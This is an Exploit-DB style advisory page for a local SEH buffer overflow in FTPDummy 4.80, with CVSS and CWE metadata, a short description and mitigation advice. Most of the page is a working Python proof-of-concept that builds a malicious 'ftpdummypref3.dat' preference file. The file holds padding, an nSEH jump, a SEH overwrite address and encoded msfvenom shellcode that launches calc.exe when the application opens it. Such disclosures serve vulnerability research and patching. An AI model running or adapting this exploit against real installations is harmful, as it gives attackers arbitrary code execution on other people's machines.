FTPDummy 4.80 - Local Buffer Overflow (SEH)

vendor:

FTPDummy

by:

Felipe Winsnes

7.5

CVSS

HIGH

Local Buffer Overflow

119

CWE

Product Name: FTPDummy

Affected Version From: 4.8

Affected Version To: 4.8

Patch Exists: NO

Related CWE:

CPE: dummysoftware:ftpdummy:4.80

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 (x86)

2020

FTPDummy 4.80 – Local Buffer Overflow (SEH)

The FTPDummy 4.80 software is vulnerable to a local buffer overflow. An attacker can create a specially crafted file, which when placed in the appropriate directory and opened by the application, can lead to arbitrary code execution. This can be exploited to gain unauthorized access or perform other malicious actions on the affected system.

Mitigation:

Update to a patched version of the software. Avoid opening files from untrusted sources.

Source

Exploit-DB raw data:

# Exploit Title: FTPDummy 4.80 - Local Buffer Overflow (SEH)
# Date: 2020-07-22
# Author: Felipe Winsnes
# Software Link: http://www.dummysoftware.com/ftpdummy.html
# Version: 4.80
# Tested on: Windows 7 (x86)

# Blog: https://whitecr0wz.github.io/

# Proof of Concept:
# 1.- Run the python script, it will create the file "ftpdummypref3.dat".
# 2.- Place the generated file into "C:\Program Files\FTPDummy!\".
# 3.- Open the application.
# 4.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e"
buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45"
buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c"
buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b"
buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30"
buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52"
buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a"
buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72"
buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54"
buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71"
buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57"
buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34"
buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49"
buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50"
buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43"
buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38"
buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72"
buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b"
buf += b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44"
buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a"
buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c"
buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71"
buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42"
buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f"
buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50"
buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45"
buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59"
buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32"
buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42"
buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78"
buf += b"\x50\x65\x73\x30\x41\x41"

start = "\x41"* 8
start += "\x0d\x0a\x31\x0d\x0a"
ending = "\x0d\x0a"

end = "170.1.1.0"
end += "\x0d\x0a"
end += "\x22"
end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE"
end += "\x22"

nseh = "\x70\x08\x71\x06"
seh = struct.pack("<I", 0x0044D078)

buffer = start + "A" * 477 + nseh + seh + "A" * 5 + buf + "\xff" * 2000 + ending + end

try:
    f = open ("ftpdummypref3.dat", "w")
    f.write(buffer)
    f.close()
    print "[+] The file has been created successfully!"

except:
    print "[!] There has been an error while creating the file."